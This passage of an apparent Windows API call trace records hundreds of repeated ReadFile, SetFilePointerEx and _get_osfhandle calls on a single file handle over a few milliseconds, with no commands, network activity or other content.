lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 
[0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, 